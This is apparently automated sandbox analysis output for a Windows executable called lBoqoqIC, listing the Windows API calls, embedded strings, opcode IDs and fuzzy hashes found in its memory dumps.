                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CursorLoadVersion$Process
                                                                                                                • String ID:
                                                                                                                • API String ID: 2246821583-0
                                                                                                                APIs
                                                                                                                • lstrlen.KERNEL32(?), ref: 004CD845
                                                                                                                • GetWindowTextA.USER32(?,?,00000100), ref: 004CD861
                                                                                                                • lstrcmp.KERNEL32(?,?), ref: 004CD875
                                                                                                                • SetWindowTextA.USER32(?,?), ref: 004CD885
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: TextWindow$lstrcmplstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 330964273-0
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0047F32F
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 004C279E: __EH_prolog.LIBCMT ref: 004C27A3
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 004C61B3: __EH_prolog.LIBCMT ref: 004C61B8
                                                                                                                  • Part of subcall function 0047A66E: __EH_prolog.LIBCMT ref: 0047A673
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$Interlocked$DecrementIncrement
                                                                                                                • String ID: Global include script: %s$Include script:
                                                                                                                • API String ID: 715401920-2954161150
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00474125
                                                                                                                  • Part of subcall function 004CF94C: __EH_prolog.LIBCMT ref: 004CF951
                                                                                                                  • Part of subcall function 004CF94C: SetRectEmpty.USER32(?), ref: 004CF9D5
                                                                                                                  • Part of subcall function 0041519E: __EH_prolog.LIBCMT ref: 004151A3
                                                                                                                  • Part of subcall function 004744FF: __EH_prolog.LIBCMT ref: 00474504
                                                                                                                  • Part of subcall function 004744FF: GetFileAttributesA.KERNEL32(?,?,?,?,?,004741D2), ref: 004745D5
                                                                                                                  • Part of subcall function 004744FF: ExtractIconA.SHELL32(?,?,00000000), ref: 004745ED
                                                                                                                  • Part of subcall function 004744FF: LoadIconA.USER32(?,00000073), ref: 0047460D
                                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 004741EC
                                                                                                                  • Part of subcall function 004C764B: wsprintfA.USER32 ref: 004C7681
                                                                                                                  • Part of subcall function 004C764B: GetClassInfoA.USER32(?,-00000058,?), ref: 004C76AC
                                                                                                                  • Part of subcall function 004D015D: LoadMenuA.USER32(?,?), ref: 004D017A
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0047FCF1: __EH_prolog.LIBCMT ref: 0047FCF6
                                                                                                                  • Part of subcall function 004C9476: SetWindowTextA.USER32(00000000,00000001), ref: 004C9484
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                 • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$Load$IconInterlocked$AttributesClassCursorDecrementEmptyExtractFileIncrementInfoMenuRectTextWindowwsprintf
                                                                                                                • String ID: Setup Application
                                                                                                                • API String ID: 290103600-2584944704
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0047A405
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                • GetFileAttributesA.KERNEL32(?,00510870,?,00510870,?,00000000,/T:,?,00000000,00510870,?,00000000,0000005C), ref: 0047A467
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFileH_prologIncrementInterlocked
                                                                                                                • String ID: %s\%s_%d
                                                                                                                • API String ID: 4080302251-3340698188
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0047A5B6
                                                                                                                  • Part of subcall function 004C2FCD: _wctomb_s.LIBCMT ref: 004C2FF5
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 0047A721: __EH_prolog.LIBCMT ref: 0047A726
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$DecrementInterlocked_wctomb_s
                                                                                                                • String ID: %m/%d/%Y %H:%M:%S$[%s] %s
                                                                                                                • API String ID: 271162083-3005055929
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,?,0049A7E5,00000000,00008CFC,?,?,?,?,?,0049F866,?,?,0049AF7F,00000000), ref: 0049A661
                                                                                                                • GetDriveTypeA.KERNEL32(?,?,0049A7E5,00000000,00008CFC,?,?,?,?,?,0049F866,?,?,0049AF7F,00000000), ref: 0049A6A0
                                                                                                                Similarity
                                                                                                                • API ID: DriveTypeValue
                                                                                                                • String ID: A:\
                                                                                                                • API String ID: 4123041233-3379428675
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004D4878: TlsGetValue.KERNEL32(005265C0,00000000,00000100,004D374A,004D317A,004C9C8D,00000100,004C9C26,?,?,00000100,00000000,?), ref: 004D48B7
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004C6E9D
                                                                                                                • SetWindowsHookExA.USER32(00000005,004C6C85,00000000,00000000), ref: 004C6EAD
                                                                                                                Similarity
                                                                                                                • API ID: CurrentHookThreadValueWindows
                                                                                                                • String ID: $aR
                                                                                                                • API String ID: 933525246-965106960
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(UxTheme.dll,?,0041630F), ref: 0047E65C
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID: UxTheme.dll$iG
                                                                                                                • API String ID: 1029625771-2390437190
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004044F9
                                                                                                                • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 004045B6
                                                                                                                • RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,000000FF,?,00000000), ref: 00404621
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue$DecrementH_prologInterlocked
                                                                                                                • String ID:
                                                                                                                • API String ID: 1237612571-0
                                                                                                                • Opcode ID: 7528382f28028c899e1fe6c9f3e12a0a0b58a777ec8e5e12a6a885f49f894914
                                                                                                                • Instruction ID: fc0920980efee45fbcd1764342af2500b69d401bf853757527575196b227173a
                                                                                                                • Opcode Fuzzy Hash: 7528382f28028c899e1fe6c9f3e12a0a0b58a777ec8e5e12a6a885f49f894914
                                                                                                                • Instruction Fuzzy Hash: D35171B590020AAFCF14EF55CC819BFB7A8EB54354B10863FF916A6291DB389E44CB58
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00403E72
                                                                                                                  • Part of subcall function 0040523A: __EH_prolog.LIBCMT ref: 0040523F
                                                                                                                  • Part of subcall function 0040523A: RegConnectRegistryA.ADVAPI32(00000000,00000000,80000001), ref: 004052CD
                                                                                                                • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,?,?,00000000,?,00000000), ref: 00403F19
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$ConnectCreateRegistry
                                                                                                                • String ID:
                                                                                                                • API String ID: 1842273942-0
                                                                                                                • Opcode ID: f1dd844671334bff9d5d15661f0fce51c85602ad5360fdb6cf0306c4d263b402
                                                                                                                • Instruction ID: 5a94a51e0e1a307b10566d9ea27da0203816566d87896286c0cb58d667725f46
                                                                                                                • Opcode Fuzzy Hash: f1dd844671334bff9d5d15661f0fce51c85602ad5360fdb6cf0306c4d263b402
                                                                                                                • Instruction Fuzzy Hash: E241927150061AEFCF14DF65C8859AEBBB9FF14318B10463EF416A32D1DB38AA44CB54
                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,00000002,00000000,00000000), ref: 100029D6
                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 10002A98
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,0000022C,00000000,?,00000000,?,00000002,00000000,00000000), ref: 10002AAD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle$NextProcess32
                                                                                                                • String ID:
                                                                                                                • API String ID: 4178769372-0
                                                                                                                • Opcode ID: 88ed902c0ced1780573d8740a3fd659acb8d11b1e7ff5e31ae1650995ba61a10
                                                                                                                • Instruction ID: 791ee29df6420dbc1df9ebb71188e7b9149e9e5b8f5cb753478d4d4ed05f3943
                                                                                                                • Opcode Fuzzy Hash: 88ed902c0ced1780573d8740a3fd659acb8d11b1e7ff5e31ae1650995ba61a10
                                                                                                                • Instruction Fuzzy Hash: 17319231B012299BEB60DF64CCC47AAB3F5FB49390F1141AAEC49A7245DB34AF44CB95
                                                                                                                APIs
                                                                                                                • GetLocalTime.KERNEL32(00000000), ref: 004B1FD7
                                                                                                                • GetSystemTime.KERNEL32(?), ref: 004B1FE1
                                                                                                                • GetTimeZoneInformation.KERNEL32(?), ref: 004B2036
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Time$InformationLocalSystemZone
                                                                                                                • String ID:
                                                                                                                • API String ID: 2475273158-0
                                                                                                                • Opcode ID: 3e2a79ae69ddfe7ada1d8b8ae77205117ab81feeb39ce546304fb2acab6e51cf
                                                                                                                • Instruction ID: 882b0712ff75beb724ccb766c74c26bc787052be0c9ffaf838913f20df494ec8
                                                                                                                • Opcode Fuzzy Hash: 3e2a79ae69ddfe7ada1d8b8ae77205117ab81feeb39ce546304fb2acab6e51cf
                                                                                                                • Instruction Fuzzy Hash: 5A217C6980011AA9CF21BB98E9485FF73B9EF16714F440542FE10A6195E3B99CCBD738
                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNEL32(00000000,00000000), ref: 100010A5
                                                                                                                • _strrchr.LIBCMT ref: 100010C7
                                                                                                                • Sleep.KERNEL32(00000BB8), ref: 10001106
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFileSleep_strrchr
                                                                                                                • String ID:
                                                                                                                • API String ID: 3716549459-0
                                                                                                                • Opcode ID: 8bd50a9514e77996769756eb4c6cb63619a1aac733721de8239520105862a2d2
                                                                                                                • Instruction ID: 33fd65163d7709d09d2e28cddad96ba6c29136b2bcc8748d4c9500cb61dd6f37
                                                                                                                • Opcode Fuzzy Hash: 8bd50a9514e77996769756eb4c6cb63619a1aac733721de8239520105862a2d2
                                                                                                                • Instruction Fuzzy Hash: 0F110D76D015A457F721EA395C42AEF7598DF865E0F050235FD40E724DEF60ED8181E2
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,755683C0,0049F725), ref: 0049AD07
                                                                                                                • CreateFileA.KERNEL32(00008CFC,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000), ref: 0049AD50
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0049AD73
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateFileHandleValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 4140045754-0
                                                                                                                • Opcode ID: ce5626d54503a7b3f5bf4b459af73d3458ef7a8503d937d6539d1571e353c893
                                                                                                                • Instruction ID: f6f4e112e4ce2bb73bfbcb23924a9de1f7d412b1aac662afb54e41e4c53ccf41
                                                                                                                • Opcode Fuzzy Hash: ce5626d54503a7b3f5bf4b459af73d3458ef7a8503d937d6539d1571e353c893
                                                                                                                • Instruction Fuzzy Hash: 7001C071A047105FE7709B78FC84B97B7E9EB91724F000629F6969B292EB34B8028794
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,00000AF6,00000000,7556E800,?,0049F2F9,?), ref: 0049ABEA
                                                                                                                • ReadFile.KERNEL32(?,00008F5C,?,?,00000000), ref: 0049AC13
                                                                                                                • OemToCharA.USER32(00008F5C,00008F5C), ref: 0049AC5F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharFileReadValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3634997981-0
                                                                                                                • Opcode ID: 0081f0f8bba094984e3009cd0cdc4d87ac9d6e9b8673cd58c5d94f3df262ad0b
                                                                                                                • Instruction ID: 1d5b2681e5679cb6685b946451578220220abf3c1ab67282c19e321293ac1009
                                                                                                                • Opcode Fuzzy Hash: 0081f0f8bba094984e3009cd0cdc4d87ac9d6e9b8673cd58c5d94f3df262ad0b
                                                                                                                • Instruction Fuzzy Hash: B70145212043867BDA248B25DD0CF93BF98EF56385F14413DF9489A242DB78A420C7FA
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004746DD
                                                                                                                  • Part of subcall function 0047EAA1: __EH_prolog.LIBCMT ref: 0047EAA6
                                                                                                                  • Part of subcall function 00416A2F: __EH_prolog.LIBCMT ref: 00416A34
                                                                                                                  • Part of subcall function 00416A2F: RemoveFontResourceA.GDI32(?), ref: 00416AC9
                                                                                                                  • Part of subcall function 00416A2F: DeleteFileA.KERNEL32(?), ref: 00416ADC
                                                                                                                  • Part of subcall function 00416A2F: DeleteFileA.KERNEL32(?), ref: 00416AE1
                                                                                                                  • Part of subcall function 00416A2F: RemoveDirectoryA.KERNEL32(?), ref: 00416AEF
                                                                                                                  • Part of subcall function 0046E6B9: __EH_prolog.LIBCMT ref: 0046E6BE
                                                                                                                • IsWindow.USER32(?), ref: 0047472D
                                                                                                                • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 00474740
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$DeleteFileRemove$DirectoryFontMessageResourceSendWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3974206257-0
                                                                                                                • Opcode ID: fdb7ed0860c2d171336bd86c24b8177de62f87f0ec541bd3c50e2faff4b55d39
                                                                                                                • Instruction ID: aee8dc672e3bbfe0a931ba75feb733b7b542473cf7a10da7850593281d57dc1c
                                                                                                                • Opcode Fuzzy Hash: fdb7ed0860c2d171336bd86c24b8177de62f87f0ec541bd3c50e2faff4b55d39
                                                                                                                • Instruction Fuzzy Hash: 9401B530A002049FD724EF62ED52BED7770FF21344F00826EE002561E1DB785D09CB04
                                                                                                                APIs
                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0047EEE6
                                                                                                                • TranslateMessage.USER32(?), ref: 0047EEF6
                                                                                                                • DispatchMessageA.USER32(?), ref: 0047EF00
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$DispatchPeekTranslate
                                                                                                                • String ID:
                                                                                                                • API String ID: 4217535847-0
                                                                                                                • Opcode ID: 9b5e90a7d5b3ca2b41053dccd8d8ce9ecb39ea6421882205f04e287ed5a0c160
                                                                                                                • Instruction ID: 0a900b5af952ede9e3c83384dfd3e407d7c315eabae43bab8278ecfab2e499bc
                                                                                                                • Opcode Fuzzy Hash: 9b5e90a7d5b3ca2b41053dccd8d8ce9ecb39ea6421882205f04e287ed5a0c160
                                                                                                                • Instruction Fuzzy Hash: 47F08272C0014EBACF209BB69C49DDF7B7CDBC9B40F00456AF601E2041D1649001C774
                                                                                                                APIs
                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004CB06A
                                                                                                                • TranslateMessage.USER32(?), ref: 004CB08A
                                                                                                                • DispatchMessageA.USER32(?), ref: 004CB091
                                                                                                                Similarity
                                                                                                                • API ID: Message$DispatchTranslate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1706434739-0
                                                                                                                • Opcode ID: ff4bbb0ee11cb8d23436d36dc4f1afe6452884652fce5e061bdfbf09a135d43b
                                                                                                                • Instruction ID: dce87cc10bfe5041a6df20c361f3a06625ccd264afa43fff3afcf659aab450c6
                                                                                                                • Opcode Fuzzy Hash: ff4bbb0ee11cb8d23436d36dc4f1afe6452884652fce5e061bdfbf09a135d43b
                                                                                                                • Instruction Fuzzy Hash: C3E09232210140ABD7615B76AC89E7F77ACFF91B02F05082EF502C5150C7689C428AA9
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0047B9B9
                                                                                                                  • Part of subcall function 0047A66E: __EH_prolog.LIBCMT ref: 0047A673
                                                                                                                Strings
                                                                                                                • Language set: Primary = %d, Secondary = %d, xrefs: 0047B9E2
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: Language set: Primary = %d, Secondary = %d
                                                                                                                • API String ID: 3519838083-4264154087
                                                                                                                • Opcode ID: 216a2acae7aef0f33b2617180a7c08b81214485d474aa1e678252c03f0c37f59
                                                                                                                • Instruction ID: dee9fd5dd59b1262cc13e65939659595cd697f9fac8810049e0308c11502762b
                                                                                                                • Opcode Fuzzy Hash: 216a2acae7aef0f33b2617180a7c08b81214485d474aa1e678252c03f0c37f59
                                                                                                                • Instruction Fuzzy Hash: 4C61E1726001049FCB10EF59C891EEEB7B1EF58310B18C06FE919A73A1DB38AE44CB94
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: --@@
                                                                                                                • API String ID: 3519838083-3308024793
                                                                                                                • Opcode ID: 2ea4cac854f786cabf418f287b1bb0631b3a4079049840bd552f9c6e967cd7d0
                                                                                                                • Instruction ID: 9ac3a6a2b375bd2f3583f9d65706c1f659bdcc1bdcb8e2b34007ee0ad129e0d2
                                                                                                                • Opcode Fuzzy Hash: 2ea4cac854f786cabf418f287b1bb0631b3a4079049840bd552f9c6e967cd7d0
                                                                                                                • Instruction Fuzzy Hash: 29419375800749EBCB05EBA5C845FEEBBB8EF14314F04405EB416A3281DB78A748CB65
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00404150
                                                                                                                  • Part of subcall function 004044F4: __EH_prolog.LIBCMT ref: 004044F9
                                                                                                                  • Part of subcall function 004044F4: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 004045B6
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$QueryValue
                                                                                                                • String ID: ***!!!***@@
                                                                                                                • API String ID: 179822093-661900980
                                                                                                                • Opcode ID: c1de74e39bb8087cf9383929cfa2b1199a87e5bf0d80d0620a2d18a8e130d69d
                                                                                                                • Instruction ID: b9e3c9737692fe52a187b19bcdd2edbaff5e44d939a0c7dcbb453eb1b618f4bf
                                                                                                                • Opcode Fuzzy Hash: c1de74e39bb8087cf9383929cfa2b1199a87e5bf0d80d0620a2d18a8e130d69d
                                                                                                                • Instruction Fuzzy Hash: 20311BB5D0025ADECF04EF95C985AEEBBB4FB64304F14402FE611A2281D7785B85CBA5
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0047F224
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0046DA88: __EH_prolog.LIBCMT ref: 0046DA8D
                                                                                                                  • Part of subcall function 004C61B3: __EH_prolog.LIBCMT ref: 004C61B8
                                                                                                                  • Part of subcall function 0047A66E: __EH_prolog.LIBCMT ref: 0047A673
                                                                                                                Strings
                                                                                                                • Run client data event: , xrefs: 0047F2A9
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$IncrementInterlocked
                                                                                                                • String ID: Run client data event:
                                                                                                                • API String ID: 2670639370-676025092
                                                                                                                • Opcode ID: 91fef82a63723f7f377bf9027ec307932a14c1871ee3593f6a628888841b2dea
                                                                                                                • Instruction ID: ca018967f3585156ccab3e5e7745356f872fd8c5a792b7ff8c1e00e43b6a3b8e
                                                                                                                • Opcode Fuzzy Hash: 91fef82a63723f7f377bf9027ec307932a14c1871ee3593f6a628888841b2dea
                                                                                                                • Instruction Fuzzy Hash: B6319575900248EFCB14EBA4C986FEE7BA8AF15344F04416EF805A7292D7385F48C795
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004C67E7
                                                                                                                  • Part of subcall function 004D4878: TlsGetValue.KERNEL32(005265C0,00000000,00000100,004D374A,004D317A,004C9C8D,00000100,004C9C26,?,?,00000100,00000000,?), ref: 004D48B7
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: H_prologValue
                                                                                                                • String ID: $aR
                                                                                                                • API String ID: 3700342317-965106960
                                                                                                                • Opcode ID: 17d163ec67b60d62d2b55e952e23a184c2069489cfb9e2b06ddc5e0323897b94
                                                                                                                • Instruction ID: 0c0cf30b69844c62e14cd8862a4cb4d399ee87cfbf31c85da1f3a67f49a08b51
                                                                                                                • Opcode Fuzzy Hash: 17d163ec67b60d62d2b55e952e23a184c2069489cfb9e2b06ddc5e0323897b94
                                                                                                                • Instruction Fuzzy Hash: 17214476A01209EFCF41DF54C481BEE7BB9FF44358F01806AF815AB241C778AA44CBA4
                                                                                                                APIs
